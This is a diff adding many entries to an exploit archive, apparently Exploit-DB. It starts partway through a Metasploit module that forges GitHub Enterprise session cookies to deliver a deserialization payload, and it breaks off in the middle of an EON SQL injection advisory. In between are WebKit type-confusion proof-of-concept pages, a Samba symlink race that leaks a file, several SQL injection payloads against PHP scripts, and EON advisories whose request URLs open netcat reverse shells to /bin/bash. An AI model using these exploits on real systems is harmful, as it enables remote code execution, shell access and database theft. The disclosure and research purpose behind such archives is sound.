|
||||
res = send_request_cgi!({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'vars_get' =>{
|
||||
'redirect_to' => '/'
|
||||
}
|
||||
})
|
||||
|
||||
unless res
|
||||
vprint_error('Connection timed out.')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
unless res.get_cookies.match(/^_gh_manage/)
|
||||
vprint_error('No _gh_manage value in cookie found')
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
cookies = res.get_cookies
|
||||
vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
|
||||
gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
|
||||
data = gh_manage_value.split('--').first
|
||||
hmac = gh_manage_value.split('--').last.split(';', 2).first
|
||||
vprint_status("Data: #{data.gsub(/\n/, '')}")
|
||||
vprint_status("Extracted HMAC: #{hmac}")
|
||||
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
|
||||
vprint_status("Expected HMAC: #{expected_hmac}")
|
||||
|
||||
if expected_hmac == hmac
|
||||
vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def get_ruby_code
|
||||
b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
|
||||
bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
|
||||
register_file_for_cleanup(b64_fname, bin_fname)
|
||||
p = Rex::Text.encode_base64(generate_payload_exe)
|
||||
|
||||
c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
|
||||
c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
|
||||
c << "%x(chmod +x #{bin_fname}); "
|
||||
c << "%x(#{bin_fname})"
|
||||
c
|
||||
end
|
||||
|
||||
|
||||
def serialize
|
||||
# We don't want to run this code within the context of Framework, so we run it as an
|
||||
# external process.
|
||||
# Brilliant trick from Brent and Adam to overcome the issue.
|
||||
ruby_code = %Q|
|
||||
module Erubis;class Eruby;end;end
|
||||
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||
|
||||
erubis = Erubis::Eruby.allocate
|
||||
erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
|
||||
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||
proxy.instance_variable_set :@instance, erubis
|
||||
proxy.instance_variable_set :@method, :result
|
||||
proxy.instance_variable_set :@var, "@result"
|
||||
|
||||
session =
|
||||
{
|
||||
'session_id' => '',
|
||||
'exploit' => proxy
|
||||
}
|
||||
|
||||
print Marshal.dump(session)
|
||||
|
|
||||
|
||||
serialized_output = `ruby -e "#{ruby_code}"`
|
||||
|
||||
serialized_object = [serialized_output].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)
|
||||
|
||||
return serialized_object, hmac
|
||||
end
|
||||
|
||||
def send_serialized_data(dump, hmac)
|
||||
uri = normalize_uri(target_uri.path)
|
||||
gh_manage_value = CGI.escape("#{dump}--#{hmac}")
|
||||
cookie = "_gh_manage=#{gh_manage_value}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
if res
|
||||
print_status("Server returned: #{res.code}")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
dump, hmac = serialize
|
||||
print_status('Serialized Ruby stager')
|
||||
|
||||
print_status('Sending serialized Ruby stager...')
|
||||
send_serialized_data(dump, hmac)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
Handy information:
|
||||
|
||||
To deobfuscate Github code, use this script:
|
||||
https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42
|
||||
|
||||
Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
|
||||
algorithm:
|
||||
|
||||
* Takes the session hash (Json) in env['rack.session']
|
||||
* Marshal.dump the hash into a string
|
||||
* Base64 the string
|
||||
* Append a hash of the data at the end of the string to prevent tampering.
|
||||
* The signed data is saved in _gh_manage'
|
||||
|
||||
The format looks like this:
|
||||
|
||||
[ DATA ]--[ Hash ]
|
||||
|
||||
Also see:
|
||||
https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
|
||||
|
||||
=end
|
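--- a/platforms/multiple/dos/41741.html
+++ b/platforms/multiple/dos/41741.html
@@ -0,0 +1,56 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036
+
+There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.
+
+A minimal PoC is as follows, and a full PoC is attached.
+
+
+var i = new Intl.DateTimeFormat();
+var q;
+
+function f(){
+q = f.caller;
+return 10;
+}
+
+
+i.format({valueOf : f});
+
+q.call(0x77777777);
+-->
+
+<html>
+<body>
+<script>
+
+var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
+
+var i = new Intl.DateTimeFormat();
+
+//print(i);
+
+var q;
+
+function f(){
+
+//print("in f");
+//print(f.caller);
+q = f.caller;
+return 10;
+}
+
+try{
+i.format({valueOf : f});
+}catch(e){
+
+//print("problem");
+
+}
+
+//print(q);
+q.call(0x77777777);
+
+</script>
+</body>
+</html>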
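Review bot: The final `q.call(0x77777777);` runs outside the try/catch that wraps `i.format(...)`, so on an engine where format() never calls back into `f`, `q` stays undefined and the page ends in a TypeError that reads like a broken test rather than a "not affected" result. A guard such as `if (typeof q !== 'function') { alert('not affected'); } else { q.call(0x77777777); }` makes the negative outcome explicit; the same applies to the unguarded `q(0x7777, 0x7777, 0);` at the end of 41742.html. The `var date = new Date(Date.UTC(...))` declared near the top of the script is never referenced and could be dropped.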
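--- a/platforms/multiple/dos/41742.html
+++ b/platforms/multiple/dos/41742.html
@@ -0,0 +1,55 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
+
+If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.
+
+A minimal example of this issue is as follows, and a full example is attached.
+
+var q;
+function g(){
+q = g.caller;
+return 7;
+}
+
+
+var a = [1, 2, 3];
+a.length = 4;
+Object.defineProperty(Array.prototype, "3", {get : g});
+[4, 5, 6].concat(a);
+q(0x77777777, 0x77777777, 0);
+
+
+I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems
+-->
+
+<html>
+<body>
+<script>
+
+var q;
+function g(){
+//print("in g");
+//print(arguments.caller);
+//print(g.caller);
+q = g.caller;
+//print(g.caller);
+return 7;
+
+}
+
+var a = [1, 2, 3];
+
+Object.defineProperty( Array.prototype, "1", { get : g} );
+
+
+var a = [1, 2, 3];
+a.length = 4;
+Object.defineProperty(Array.prototype, "3", {get : g});
+
+[4, 5, 6].concat(a);
+alert(q);
+q(0x7777, 0x7777, 0);
+
+</script>
+</body>
+</html>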
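--- a/platforms/multiple/dos/41743.html
+++ b/platforms/multiple/dos/41743.html
@@ -0,0 +1,70 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
+
+There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
+
+This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
+
+This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
+
+
+A minimal PoC is as follows, and a full PoC is attached.
+
+
+var ba;
+
+function s(){
+ba = this;
+}
+
+
+function dummy(){
+alert("just a function");
+}
+
+
+Object.defineProperty(Array.prototype, "0", {set : s });
+var f = dummy.bind({}, 1, 2, 3, 4);
+ba.length = 100000;
+f(1, 2, 3);
+-->
+
+<html>
+<body>
+<script>
+
+var ba;
+
+function s(){
+alert("in s");
+ba = this;
+}
+
+
+function g(){
+alert("in g");
+return 7;
+}
+
+
+function dummy(){
+alert("just a function");
+}
+
+alert("start");
+
+try{
+Object.defineProperty(Array.prototype, "0", {set : s, get : g});
+var f = dummy.bind({}, 1, 2, 3, 4);
+alert("ba" + ba);
+ba.length = 100000;
+f(1, 2, 3);
+}catch(e){
+
+alert(e.message);
+
+}
+
+</script>
+</body>
+</html>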
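--- a/platforms/multiple/remote/41740.txt
+++ b/platforms/multiple/remote/41740.txt
@@ -0,0 +1,94 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
+
+The Samba server is supposed to only grant access to configured share
+directories unless "wide links" are enabled, in which case the server is allowed
+to follow symlinks. The default (since CVE-2010-0926) is that wide links are
+disabled.
+
+smbd ensures that it isn't following symlinks by calling lstat() on every
+path component, as can be seen in strace (in reaction to the request
+"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
+
+root@debian:/home/user# strace -e trace=file -p18954
+Process 18954 attached
+lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+getcwd("/public", 4096) = 8
+lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available)
+stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35
+
+
+This is racy: Any of the path components - either one of the directories or the
+file at the end - could be replaced with a symlink by an attacker over a second
+connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i
+with a symlink to / immediately before the open() call would cause smbd to open
+/j.
+
+To reproduce:
+
+- Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian
+unstable. I'm running the attacks on a native machine while the server is
+running in a VM on the same machine.)
+- On the server, create a world-readable file "/secret" that contains some
+text. The goal of the attacker is to leak the contents of that file.
+- On the server, create a directory "/public", mode 0777.
+- Create a share named "public", accessible for guests, writable, with path
+"/public".
+- As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in
+attack_commands.patch.
+- Build the patched copy of samba-4.5.2. The built smbclient will be used in
+the following steps.
+- Prepare the server's directory layout remotely and start the rename side of
+the race:
+
+$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
+./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
+Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
+smb: \> posix
+Server supports CIFS extensions 1.0
+Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
+smb: /> ls
+. D 0 Wed Dec 14 23:54:30 2016
+.. D 0 Wed Dec 14 13:02:50 2016
+
+98853468 blocks of size 1024. 66181136 blocks available
+smb: /> symlink / link
+smb: /> mkdir normal
+smb: /> put /tmp/empty normal/secret # empty file
+putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s)
+smb: /> rename_loop link normal foobar
+
+- Over a second connection, launch the read side of the race:
+
+$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
+./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
+Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
+smb: \> posix
+Server supports CIFS extensions 1.0
+Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
+smb: /> dump foobar/secret
+
+- At this point, the race can theoretically be hit. However, because the
+renaming client performs operations synchronously, the network latency makes
+it hard to win the race. (It shouldn't be too hard to adapt the SMB client to
+be asynchronous, which would make the attack much more practical.) To make it
+easier to hit the race, log in to the server as root and run "strace" against
+the process that is trying to access foobar/secret all the time without any
+filtering ("strace -p19624"). On my machine, this causes the race to be hit
+every few seconds, and the smbclient that is running the "dump" command
+prints the contents of the file each time the race is won.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip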
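--- a/platforms/php/webapps/41724.txt
+++ b/platforms/php/webapps/41724.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://justanothervideoscript.com/
+# Software: http://justanothervideoscript.com/demo
+# Demo: http://javsdemo.com/
+# Version: 1.4.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
+# # # # #
+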
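--- a/platforms/php/webapps/41725.txt
+++ b/platforms/php/webapps/41725.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Adult Tube Video Script - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://www.boysofts.com/
+# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
+# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/single-video.php?video_id=[SQL]
+# http://localhost/[PATH]/search.php?page=[SQL]
+# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
+# # # # #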
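--- a/platforms/php/webapps/41726.txt
+++ b/platforms/php/webapps/41726.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Alibaba Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
+# Demo: http://thealidemox.com
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #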
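--- a/platforms/php/webapps/41727.txt
+++ b/platforms/php/webapps/41727.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
+# Demo: http://demob2b.xyz/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #
+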
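--- a/platforms/php/webapps/41728.txt
+++ b/platforms/php/webapps/41728.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Real Estate Property Pro Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/php-property-portal-script
+# Demo: http://realpro.phpscriptsdemo.com/
+# Version: Pro
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
+# Etc...
+# # # # #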
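--- a/platforms/php/webapps/41729.txt
+++ b/platforms/php/webapps/41729.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
+# Demo: http://courierv6.couriersoftwares.com/
+# Version: 6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
+# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
+# user:username
+# user:hub_name
+# user:password
+# user:hidden_pass
+# user:entrydate
+# user:onlinestatus
+# user:status
+# Etc...
+# # # # #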
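--- a/platforms/php/webapps/41730.txt
+++ b/platforms/php/webapps/41730.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
+# Demo: http://parceldelivery.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
+# Etc...
+# # # # #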
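--- a/platforms/php/webapps/41731.txt
+++ b/platforms/php/webapps/41731.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/delux-same-day-delivery
+# Demo: http://deluxesameday.logistic-softwares.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/show_page/[PAGE][SQL]
+# Etc...
+# # # # #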
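--- a/platforms/php/webapps/41732.txt
+++ b/platforms/php/webapps/41732.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/hotel-booking-script
+# Demo: http://hotelbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
+# http://localhost/[PATH]/view_news.php?news_id=[SQL]
+# http://localhost/[PATH]/page.php?id=[SQL]
+# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
+# admin:id
+# admin:username
+# admin:password
+# booking:id
+# booking:cat_name
+# Etc...
+# # # # #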
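--- a/platforms/php/webapps/41733.txt
+++ b/platforms/php/webapps/41733.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Tour Package Booking v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: www.eaglescripts.com/tour-package-booking-script
+# Demo: http://tourbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/package/category/1[SQL]
+# http://localhost/[PATH]/package_detail/1[SQL]
+# Etc...
+# # # # #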
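--- a/platforms/php/webapps/41735.txt
+++ b/platforms/php/webapps/41735.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Professional Bus Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://travelbookingscript.com/
+# Software: http://travelbookingscript.com/professional-bus-booking-script.html
+# Demo: http://travelbookingscript.com/demo/professional/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #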
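--- a/platforms/php/webapps/41736.txt
+++ b/platforms/php/webapps/41736.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: CouponPHP Script v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://couponphp.com/
+# Software: http://couponphp.com/demos
+# Demo: http://newdemo2.couponphp.com
+# Demo: http://newdemo3.couponphp.com
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
+# users
+# id
+# username
+# password
+# # # # #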
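--- a/platforms/php/webapps/41746.txt
+++ b/platforms/php/webapps/41746.txt
@@ -0,0 +1,132 @@
+# [CVE-2017-6087] EON 5.0 Remote Code Execution
+
+## Description
+
+EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
+
+## Remote Code Execution (authenticated)
+
+The Eonweb code does not correctly filter arguments, allowing
+authenticated users to execute arbitrary code.
+
+**CVE ID**: CVE-2017-6087
+
+**Access Vector**: remote
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 7.6
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
+
+
+### Proof of Concept 1
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `selected_events` parameter is not correctly filtered before it is
+used by the `shell_exec()` function.
+
+There, it is possible to inject a payload like in the request below,
+where we connect back to our handler:
+
+```
+https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
+```
+
+#### Vulnerable code
+
+The payload gets injected into the `$event[$key]` and `$ged_command`
+variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
+
+```
+$ged_command = "-update -type $ged_type_nbr ";
+foreach ($array_ged_packets as $key => $value) {
+if($value["type"] == true){
+if($key == "owner"){
+$event[$key] = $owner;
+}
+$ged_command .= "\"".$event[$key]."\" ";
+}
+}
+$ged_command = trim($ged_command, " ");
+shell_exec($path_ged_bin." ".$ged_command);
+```
+
+Two other functions in this file are also affected by this problem:
+
+* `delete($selected_events, $queue);`
+* `ownDisown($selected_events, $queue, $global_action);`
+
+
+### Proof of Concept 2
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `module` parameter is not correctly filtered before it is used by
+the `shell_exec()` function.
+
+Again, we inject our connecting back payload:
+
+```
+https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
+```
+
+#### Vulnerable code
+
+In the `module/index.php` file, line 24, we can see that our payload is
+injected into the `exec()` function without any sanitization:
+
+```
+# Check optionnal module to load
+if(isset($_GET["module"]) && isset($_GET["link"])) {
+
+$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
+
+# Redirect to module page if rpm installed
+if($module!=0) { header('Location: '.$_GET["link"].''); }
+
+}
+```
+
+
+## Timeline (dd/mm/yyyy)
+
+* 01/10/2016 : Initial discovery.
+* 09/10/2016 : Fisrt contact with vendor.
+* 23/10/2016 : Technical details sent to the security contact.
+* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
+* 11/10/2016 : Testing the patch revealed that it needed more work.
+* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
+* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
+repsonsible disclosure agreement.
+* 14/03/2017 : Public disclosure.
+
+Thank you to EON for the fast response.
+
+## Solution
+
+Update to version 5.1
+
+## Affected versions
+
+* Version <= 5.0
+
+## Credits
+
+* Nicolas SERRA <n.serra@sysdream.com>
+
+-- SYSDREAM Labs <labs@sysdream.com>
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/ *
+Twitter: @sysdream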
172
platforms/php/webapps/41747.txt
Executable file
172
platforms/php/webapps/41747.txt
Executable file
|
@ -0,0 +1,172 @@
|
|||
# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
|
||||
|
||||
## Description
|
||||
|
||||
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
|
||||
|
||||
## SQL injection (authenticated)
|
||||
|
||||
The Eonweb code does not correctly filter arguments, allowing
|
||||
authenticated users to inject arbitrary SQL requests.
|
||||
|
||||
**CVE ID**: CVE-2017-6088
|
||||
|
||||
**Access Vector**: remote
|
||||
|
||||
**Security Risk**: medium
|
||||
|
||||
**Vulnerability**: CWE-89
|
||||
|
||||
**CVSS Base Score**: 6.0
|
||||
|
||||
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
|
||||
|
||||
### Proof of Concept 1 (root privileges)
|
||||
|
||||
The following HTTP request allows an attacker (connected as
|
||||
administrator) to dump the database contents using SQL injections inside
|
||||
either the `bp_name` or the `display` parameter. These requests are
|
||||
executed with MySQL root privileges.
|
||||
|
||||
```
|
||||
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
|
||||
|
||||
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 114:
|
||||
|
||||
```
|
||||
function list_process($bp,$display,$bdd){
|
||||
$sql = "select name from bp where is_define = 1 and name!='".$bp."'
|
||||
and priority = '" . $display . "'";
|
||||
$req = $bdd->query($sql);
|
||||
$process = $req->fetchall();
|
||||
|
||||
echo json_encode($process);
|
||||
}
|
||||
```
|
||||
|
||||
### Proof of Concept 2
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `type` parameter:
|
||||
|
||||
```
|
||||
